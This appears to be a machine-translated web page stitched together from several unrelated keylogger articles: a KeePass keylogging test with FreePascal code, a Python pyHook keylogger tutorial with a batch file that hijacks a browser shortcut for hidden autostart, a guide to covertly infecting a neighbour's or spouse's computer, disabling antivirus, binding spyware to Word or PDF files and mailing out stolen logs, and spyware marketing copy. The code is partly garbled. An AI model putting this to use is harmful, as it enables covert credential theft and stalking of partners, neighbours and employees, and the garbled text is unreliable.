Keylogger online. Need a keylogger? Two Types of Keyloggers and How They Affect Your Computer
Keylogger is a program that reads the keys pressed and saves them to a file. In the future, you can view what the person wrote at the computer, what messages he typed and what passwords he entered. Another name for a keylogger is a keylogger, from the English “keylogger,” which literally means “recording buttons.”
In the NeoSpy program, the keylogger function is enabled by default; in this mode, the program records text, hotkey combinations and passwords typed on the keyboard. Managing keylogger settings is located in the menu "Tracking Settings" - "Log Recording" - "Keyboard". You can choose one of two operating modes of the program: standard and alternative. It is recommended to use the standard option 99% of the time, but if there is a conflict with your antivirus software, you can enable the alternative mode.
Setting up a keylogger
The keyboard log is always recorded in full format, including service keys. An example of such a log can be seen in the illustration. While viewing the report, you can disable the display of non-printable characters and view the log as simple text, more accessible for free reading.
Keylogger example
To simplify working with reports, typed passwords are highlighted in the list of keystrokes. This way you can find out your child’s passwords and, if necessary, protect him from unwanted acquaintances. If the NeoSpy program is used at an enterprise to monitor employees, then the collection of personal data and correspondence is prohibited by the legislation of most countries, so this option must be disabled, or the employee must be notified in writing about control by management and the inadmissibility of using a computer in the organization for personal correspondence.
To check the security of passwords entered via KeePass, I decided to write a simple keylogger with additional data capture from the clipboard. The entire code took a few lines in FreePascal.
Passwords, without additional security measures and proper configuration of KeePass, turned out to be quite vulnerable.
The keylogger code is placed in a Timer loop, which is updated every 10 ms. Modules used: Windows and ClipBrd.
//Compare the current state of the keys for f:= 0 to 255 do if a[f]<>GetAsyncKeyState(f) then begin //Reaction to pressing a key if KeePass.Checked and (GetAsyncKeyState(f) = 0) then Memo1.Caption:= Memo1.Caption + chr(f);<>//Reaction to key press if not KeePass.Checked and (GetAsyncKeyState(f)<>0) then Memo1.Caption:= Memo1.Caption + chr(f);
end;
//Save the current state of the keys into an array for f:= 0 to 255 do a[f] := GetAsyncKeyState(f);
//Write when changes are made to the clipboard if s
Clipboard.AsText then begin s:= Clipboard.AsText;
Memo2.Caption:= Memo2.Caption + s + " ";
end;The Simple Logger program looks like this:
The -Keyboard- window displays keys without regard to case and input language. The symbol whose number is equal to the key code is displayed: chr(f). The program can be modified to display all symbols correctly, but this is not required for this study.
Copying to the -Clipboard- window occurs when the contents of the buffer change.
Weaknesses of KeePass and their elimination1. Enter the main password
By default, the main password in KeePass is entered without secure mode, so it can be easily determined in Simple Logger. This is the most critical place in security, because... here we get access to the entire password database at once.
To fix the problem, you need to enable the Security setting “Enter the master password in protected mode (similar to UAC in Windows Vista and higher).” This mode prevents the logger from accessing the keyboard. In addition, it is impossible to take a screenshot to determine the location of the Key File.This mode is activated only when the main password is entered. The protection of other passwords will be discussed further. 2. Clipboard
Simple Logger responds to clipboard changes 100 times per second. Thus, entering the password into the buffer and then deleting it after a few seconds does not provide protection in this case.
Simple Logger does not take into account keyboard shortcuts in any way. As you can see, the Shift key is displayed as a special character (similar to “+”) and “?”. Shift is released both before and after a capital letter. However, this is enough to understand the password.
To solve this problem, you can use the “Double autodialing complexity” setting in KeePass. In this case, KeePass will enter part of the password from the keyboard and part through the clipboard, shuffling the values. This allows you to bypass some keyloggers.
Simple Logger will react to Double complication of autodialing as follows:
- Paste from the clipboard "Ctrl + V" was displayed as "V◄?";
- Left arrow – “%” (key code and symbol #37);
- Right arrow – “"” (key code and symbol #39).
Additional protection measures can help against a keylogger designed for KeePass.
4. Additional protection
Some software packages have features such as:- Protection of data input from a hardware keyboard;
- Secure browser.
When using a protected browser, it was not possible to access the clipboard and keyboard using Simple Logger. In addition, there was no way to take screenshots.
Instead of a conclusion
After looking at how our employees use KeePass, I found that some:- don't use UAC;
- do not use autodialer, simply copying passwords through a buffer;
- leave the program open when leaving the workplace;
- use default settings without configuring security policy.
I tested the latest version of KeePass 2.36 on Windows 8.1. To be fair, it should be noted that this problem is not just a KeePass problem. There are many other password keepers with greater or lesser degrees of reliability, but this is a topic for another study.
Links
- Simple Logger on GitHub
//Who cares, you can find an exe file in the “SimpleLogger_for_Win64.7z” archive. The program does not allow full-fledged keylogging; it is intended for security research and informational purposes.
Browser plugin
As user dartraiden noted, it is possible to use the module KeepPassHttp together with browser add-on PassIFox or ChromeIPass. This plugin (according to the developer) provides secure exposure of KeePass records over HTTP.This combination allows you to automatically fill in your login and password in the browser when KeePass is unlocked. Simple Logger does not react in any way in this case.
The weak point of ChromeIPass is the generation of a new password, because... it is copied via the clipboard and visible on the screen. In this case, it is better to generate a new password in KeePass itself.
Creating a new master password
As noted by arthur_veber:When replacing the master password, as well as when creating a new one, safe mode is not used.
In this case, Simple Logger intercepts the master password entered into KeePass.
The virtual on-screen keyboard from a well-known manufacturer does not help either, which, like KeePass autodialer, works based on a key press event.
It's difficult to give advice here. We probably need to draw the developers' attention to this problem.
Other means of attack
As user qw1 was the first to point out, if the system on which KeePass is installed is compromised, then other means of attack besides the keylogger can be used. In this case, the list of actions to counter the attack will depend on the specific situation.Unfortunately, it is impossible to cover in one article all the security measures that are necessary for storing passwords.
Hello, QUAZAR is here again. Today I will show you how to create a simple keylogger in Python. Of course, this keylogger cannot compete with such giants as, but despite this, it can find its use.
What is a keylogger?
You can read in detail about what a keylogger is and about the types of keyloggers in the article ““. To find additional materials on the topic, use the site search, which is located in the upper right corner. Just enter the word "keylogger" or "keylogger".
Simple keylogger in Python
To create a keylogger we need:
- Operating system: Windows or MacOs (any Linux can also be used, but I haven't tried it personally)
- Python installed on the target machine, as well as special libraries.
This material is for informational purposes only. The information presented in this article is provided for informational purposes only. Neither the editors of the website www.site nor the author of the publication bear any responsibility for any harm caused by the material in this article.
Creating a simple keylogger in Python
First you need to download and install Python.
Simple keylogger in Python After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32 and 64 bit versions for Windows and other OSes. Download "PYhook" and "pyWin32" according to your installed version of Python and Windows (32bit or 64bit).
Keylogger in Python. PYhook module 
Keylogger in Python. pyWin32 module Once downloaded, install and open IDLE (Python GUI) menu from the Start menu.
Simple keylogger in Python Go to the “File” menu and click on the “New File” item. Then paste the keylogger code:
#Name: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
And save it by naming the file Keylogger.pyw. Just don't save the file in the root directory C: where you need administrator rights to copy and delete files. Create a new folder on your C: drive or some other location where you don't need administrator rights to copy files and save Keylogger.pyw there.
You can select any location as the output report file “file_log = “C:keyloggerlog.txt”, but preferably, of course, some hidden location on your hard drive. In this example, I will save the report file to disk in the root directory C:. After all, I have nothing to hide.
Automatic launch of a keylogger in Python
The keylogger is ready. Now we need to make sure that the keylogger starts hidden from the user and automatically when Windows boots. This can be implemented in different ways. Let's try to do it using a bat file by linking the launch of the keylogger to some program or by registering it in startup.
First, create a bat file. Copy and paste the following code into Notepad:
::Name: QUAZAR
::Website: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"
In the first line you need to enter the path to the keylogger.pyw file (in my case “C:keylogger.pyw”). In the second line, you must enter the path to the program that the user usually uses (in my case, the Opera browser).
After editing, save the file with a .bat extension (in my case logger.bat) in some hidden location on your computer (in my case in “C:keylogger.bat”).
Now go to the desktop and select a shortcut for a frequently used program (in my case, this is the Opera browser). Right-click the mouse to call up the context menu and go to the shortcut properties. In the “Object” field, enter the path to the keylogger bat file “C:keyloggerlogger.bat”.
After making changes, the shortcut icon will also change. But this can be easily solved on the properties tab (see screenshot above).
Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, then let’s talk about how great it would be to get a password from your mail/social network. the network of a friend, wife/husband, roommate thought at least once, everyone. :) Yes, and you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).
So, in today’s article we’ll talk about what are free programs for monitoring windows-based computers, where you can download their full versions, how to infect a victim’s computer with them, and what are the features of their use.
But first, a little introduction.
What are keyloggers and why are they needed?
I think you yourself have guessed what it is. As a rule, they are a kind of program that is hidden (although this is not always the case) installed on the victim’s computer, after which it records absolutely all keystrokes on this node. Moreover, in addition to the clicks themselves, the following is usually recorded: the date and time of the click (action) and the program in which these actions were performed (browser, including the website address (hurray, we immediately see what the passwords are for!); local application; system services (including Windows login passwords), etc.).
From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:
- A fixed e-mail (there may be several) is the most convenient option;
- FTP server (who has it);
- SMB server (exotic, and not very convenient).
- A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).
Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:
- Logging correspondence in specified social networks. networks or instant messengers (for example, Skype).
- Taking screenshots of the screen.
- View/capture webcam data (which can be very interesting).
How to use keyloggers?
And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.
So, what is needed for a spy program to work successfully?:
- Administrator access to a remote computer.
Moreover, this does not necessarily mean physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows. - Anonymous e-mail / ftp (by which you will not be identified).
Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords). - Lack of working antiviruses / internal Windows protection systems.
Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses that are built into the OS kernel or system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Due to the above, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, systems like Windows Defender (these first appeared in Windows 7 and later) also pose a danger to our spyware. They detect suspicious activity in software running on a computer. You can easily find information on how to get rid of them on Google.
These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.
What types of spyware are there and where can I download them?
So, let’s begin the review of the main keyloggers that I used in my daily practice with links to free downloads of their full versions (i.e., all versions are the latest at the moment (for which it is possible to find a cure) and with already working and tested cracks).
0. The Rat!
Ratings (out of 10):
- Stealth: 10
- Convenience/usability: 9
- Functionality: 8
It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!
In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?
An excellent opportunity for social engineering (bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch, everything is fine and wonderful, but the friend is already invisibly infected!). Or you simply send this file to a friend by mail (preferably a link to download it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antiviruses during installation (but it will not exist after installation).
By the way, with the help of some other techniques you can glue together any hidden installation distribution (these are found in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among even more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)
Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.
1. Elite keylogger
Ratings (out of 10):
- Stealth: 10
- Convenience/usability: 9
- Functionality: 8
Perhaps one of the best keyloggers ever created. Its capabilities, in addition to the standard set (interception of all clicks in the context of applications / windows / sites), include interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kasperosky and all other anti-malware software. Frankly, I have not met a single keylogger capable of this.
However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.
In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keyloggers will work. Version 5-5.3 (links to which are given below) supports everything up to Windows 7, inclusive. Win 8 / 10, as well as Windows server family (2003 / 2008 / 2012) are no longer supported. There is version 6, which functions perfectly, incl. on win 8 and 10, however, it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.
There is no network operation mode, therefore it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.
An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).
Several screenshots of version 5 (to show how beautiful and convenient everything is):
2. All-in-one keylogger.
Ratings (out of 10):
- Stealth: 3
- Convenience/usability: 9
- Functionality: 8
It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted, it is not a driver, and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easily accessible to unauthorized users (not those on whose behalf it is installed). Nevertheless, antiviruses sooner or later successfully do this, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.
Works on any version of Win OS (which is nice and practical).
As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.
3. Spytech SpyAgent.
Ratings (out of 10):
- Stealth: 4
- Convenience/usability: 8
- Functionality: 10
Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. There is an interesting self-destruct function after a specified period of time (or upon reaching a predetermined date).
In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.
There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it (it is not included in the review due to its uselessness for one user - an individual). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent - if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. Those. where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).
4. Spyrix Personal monitor.
Ratings (out of 10):
- Stealth: 4
- Convenience/usability: 6
- Functionality: 10
The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes an interesting thing: copying files from USB drives inserted into the computer, as well as remote viewing of logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).
5. Spyrix Personal monitor.
Ratings (out of 10):
- Stealth: 3
- Convenience/usability: 6
- Functionality: 8
I won’t describe it in detail, because... this instance does not have anything that one of the previous spies did not have, however, someone may like this keylogger (at least for its interface).
What do we end up with?
The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.
If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways to increase the performance of my employees.
If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)
If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later they may attract. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we guarantee safer activities and real success.
But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.
In short, you have just begun to dive into the complex, dangerous, but incredibly interesting world of information security. :)
Sincerely,Lysyak A.S.
Elite Keylogger records all passwords typed on the computer, while remaining completely invisible to users! You will be able to intercept passwords, documents, emails, chat messages and much more.
Passwords
Elite Keylogger works in low-level driver mode and starts before the Windows system, which allows you to find out passwords and logins. Please note that the Mac version cannot record OS X login passwords.
Recording chats and mail
Elite Keylogger for Windows records chats and instant messages from many different clients, including MSN, AOL, ICQ, AIM, GTalk, Skype. Elite Keylogger for Mac can record conversations from Skype, Viber, iChat/Messages and Adium, as well as outgoing email, on both sides.
Network keylogger
Elite Keylogger is an ideal solution for remote computer monitoring. You just need to install it once - and reports will be sent to you by email or uploaded to an FTP server. This makes this utility ideal for companies that require employee computer monitoring. This application is completely invisible and cannot be detected by antivirus or antispyware software (if installed correctly).
The best website interception
Elite Keylogger is one of the best spyware programs due to its ability to record website visits for ALL popular browsers. It completely captures website addresses in Internet Explorer, Firefox, Safari, Opera, Google Chrome and other browsers. Every website address is logged, along with a timestamp of the visit, so you can easily monitor your kids' internet activity to make sure they're safe.
Friendly interface
It's so easy to use. Installation is quick and painless even for beginners. For those who need it, Elite Keylogger provides more advanced options such as remote installation or pre-configuration. Just install and you can configure and activate it in minutes. Just indicate how you would like to receive logs - and you will no longer even need to touch the spyware administrator interface, because now it will do everything automatically!
Many options for sending reports
Elite Keylogger provides many reporting options. They can be sent to you by email, uploaded to FTP, transferred to another computer on the local network, or secretly copied to a USB drive. There are no restrictions on the size of logs intended for transmission.